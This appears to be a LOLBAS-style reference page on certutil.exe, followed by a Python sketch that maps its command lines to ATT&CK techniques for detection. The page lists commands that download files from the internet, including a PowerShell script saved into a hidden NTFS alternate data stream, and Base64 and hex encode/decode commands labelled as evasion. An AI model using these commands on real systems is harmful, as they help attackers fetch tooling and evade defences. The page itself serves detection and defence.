Certutil.exe

Windows binary used for handling certificates


Paths:

Resources:
Acknowledgements:

Detection:

Download

Download and save 7zip to disk in the current folder.
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Usecase: Download file from Internet
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105



Download and save 7zip to disk in the current folder.
certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Usecase: Download file from Internet
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105



Alternate data streams

Download and save a PS1 file to an Alternate Data Stream (ADS).
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1564.004



Encode

Command to encode a file using Base64.
certutil -encode inputFileName encodedOutputFileName
Usecase: Encode files to evade defensive measures
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1027



Decode

Command to decode a Base64 encoded file.
certutil -decode encodedInputFileName decodedOutputFileName
Usecase: Decode files to evade defensive measures
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1140



Command to decode a hexadecimal-encoded file.
certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Usecase: Decode files to evade defensive measures
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1140
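
Detection-side sketch for the command lines listed above. This is an added example, not part of the original page or the LOLBAS project: it classifies process-creation command lines by the ATT&CK IDs this page assigns. The function name, the whitespace tokenisation and the sample list are assumptions made for illustration.

```python
import re

# Option name -> ATT&CK technique ID, as mapped on this page.
OPTION_TECHNIQUE = {"encode": "T1027", "decode": "T1140", "decodehex": "T1140"}
DOWNLOAD_OPTIONS = {"urlcache", "verifyctl"}  # T1105 only when a URL is present
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
DRIVE_RE = re.compile(r"^[A-Za-z]:")


def classify_certutil(command_line):
    """Return the sorted ATT&CK IDs a certutil command line matches, or []."""
    # Assumption: whitespace tokenisation is enough for these samples; real
    # telemetry needs Windows argument parsing (quoted paths with spaces).
    tokens = [t.strip('"') for t in command_line.split()]
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return []

    options, urls, paths = set(), [], []
    for tok in tokens[1:]:
        if URL_RE.match(tok):
            urls.append(tok)
        elif tok.startswith(("-", "/")):  # certutil accepts both prefixes
            options.add(tok[1:].lower())
        else:
            paths.append(tok)

    hits = {OPTION_TECHNIQUE[o] for o in options if o in OPTION_TECHNIQUE}
    if urls and options & DOWNLOAD_OPTIONS:
        hits.add("T1105")
        # A ':' after the drive letter in the output target names an NTFS stream.
        if any(":" in DRIVE_RE.sub("", p) for p in paths):
            hits.add("T1564.004")
    return sorted(hits)


# Constructed samples: the page's command lines plus one routine hashing call.
SAMPLES = [
    r"certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe",
    r"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt",
    r"certutil -decode encodedInputFileName decodedOutputFileName",
    r"C:\Windows\System32\certutil.exe -hashfile C:\temp\setup.exe SHA256",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify_certutil(line), line)
```

Matching on the image name misses renamed copies of the binary, so a production rule should also key on the PE original file name where the telemetry source records it.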